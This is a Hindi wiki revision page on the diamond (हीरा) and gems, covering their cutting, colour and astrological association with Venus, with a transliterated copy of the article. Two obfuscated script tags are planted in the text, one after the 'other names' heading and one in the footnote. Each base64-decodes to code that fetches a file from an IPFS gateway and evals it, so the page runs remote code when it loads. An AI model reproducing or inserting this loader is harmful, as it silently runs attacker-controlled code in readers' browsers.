Difference between revisions of "हीरा"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "{{लेख प्रगति" to "{{प्रचार}} {{लेख प्रगति")
m (Text replace - " रुप " to " रूप ")
Line 2: Line 2:
 
*रत्न आकर्षक [[खनिज]] का एक टुकड़ा होता है जो कटाई और पॉलिश करने के बाद गहने और अन्य [[अलंकरण]] बनाने के लिए प्रयोग किया जाता है। बहुत से रत्न ठोस खनिज के होते है, लेकिन कुछ नरम खनिज के भी होते है।  
 
*रत्न आकर्षक [[खनिज]] का एक टुकड़ा होता है जो कटाई और पॉलिश करने के बाद गहने और अन्य [[अलंकरण]] बनाने के लिए प्रयोग किया जाता है। बहुत से रत्न ठोस खनिज के होते है, लेकिन कुछ नरम खनिज के भी होते है।  
 
*रत्न अपनी चमक और अन्य भौतिक गुणों के सौंदर्य की वजह से गहने में उपयोग किया जाता है।  
 
*रत्न अपनी चमक और अन्य भौतिक गुणों के सौंदर्य की वजह से गहने में उपयोग किया जाता है।  
*ग्रेडिंग, काटने और पॉलिश से रत्नों को एक नया रुप और रंग दिया जाता है और इसी रूप और रंग की वजह से यह रत्न गहनों को और भी आकर्षक बनाते है।  
+
*ग्रेडिंग, काटने और पॉलिश से रत्नों को एक नया रूप और रंग दिया जाता है और इसी रूप और रंग की वजह से यह रत्न गहनों को और भी आकर्षक बनाते है।  
 
*रत्न का रंग ही उसकी सबसे स्पष्ट और आकर्षक विशेषता है। रत्नों को गर्म कर के उसके रंग की स्पष्टता बढ़ाई जाती है।  
 
*रत्न का रंग ही उसकी सबसे स्पष्ट और आकर्षक विशेषता है। रत्नों को गर्म कर के उसके रंग की स्पष्टता बढ़ाई जाती है।  
 
<blockquote>प्राचीन ग्रन्थों के अनुसार उच्च कोटि में 84 प्रकार के रत्न आते हैं। इनमें से बहुत से रत्न अब अप्राप्य हैं तथा बहुत से नए-नए रत्नों का आविष्कार भी हुआ है। रत्नों में मुख्यतः नौ ही रत्न ज़्यादा पहने जाते हैं। वर्तमान समय में प्राचीन ग्रंथों में वर्णित रत्नों की सूचियाँ प्रामाणिक नहीं रह गई हैं।</blockquote>
 
<blockquote>प्राचीन ग्रन्थों के अनुसार उच्च कोटि में 84 प्रकार के रत्न आते हैं। इनमें से बहुत से रत्न अब अप्राप्य हैं तथा बहुत से नए-नए रत्नों का आविष्कार भी हुआ है। रत्नों में मुख्यतः नौ ही रत्न ज़्यादा पहने जाते हैं। वर्तमान समय में प्राचीन ग्रंथों में वर्णित रत्नों की सूचियाँ प्रामाणिक नहीं रह गई हैं।</blockquote>

Revision as of 11:40, 11 January 2011

  • qimati patthar ko ratn kaha jata hai apani suandarata ki vajah se yah qimati hote hai.
  • ratn akarshak khanij ka ek tuk da hota hai jo kataee aur p aaulish karane ke bad gahane aur any alankaran banane ke lie prayog kiya jata hai. bahut se ratn thos khanij ke hote hai, lekin kuchh naram khanij ke bhi hote hai.
  • ratn apani chamak aur any bhautik gunoan ke sauandary ki vajah se gahane mean upayog kiya jata hai.
  • grediang, katane aur p aaulish se ratnoan ko ek naya roop aur rang diya jata hai aur isi roop aur rang ki vajah se yah ratn gahanoan ko aur bhi akarshak banate hai.
  • ratn ka rang hi usaki sabase spasht aur akarshak visheshata hai. ratnoan ko garm kar ke usake rang ki spashtata badhaee jati hai.

prachin granthoan ke anusar uchch koti mean 84 prakar ke ratn ate haian. inamean se bahut se ratn ab aprapy haian tatha bahut se ne-ne ratnoan ka avishkar bhi hua hai. ratnoan mean mukhyatah nau hi ratn zyada pahane jate haian. vartaman samay mean prachin granthoan mean varnit ratnoan ki soochiyaan pramanik nahian rah gee haian.

hira (vajr kpanuvadak)

nav ratn mean hira bhi hota hai aur ise nau ratnoan mean sarvashreshth mana jata hai. hira shukr grah ka ratn hai. hira ek prakar ka bahumooly ratn hai jo bahut chamakadar aur bahut kathor hota hai. hira ratn atyant mahanga v dikhane mean sundar hota hai. yah bhi kee rangoan mean paya jata hai, jaise- safed, pila, gulabi, nila, lal, kala adi. hira ratn atyant mahanga v dikhane mean sundar hota hai. safed hira sarvottam hai aur hira sabhi prakar ke ratnoan mean shreshth hai. hire ko hire ke kanoan ke dvara p aaulish karake khoobasoorat banaya jata hai.[1]

any nam

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. hira hai shukr ka ratn (hindi) navabharat taims. abhigaman tithi: 19 julaee, 2010.<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh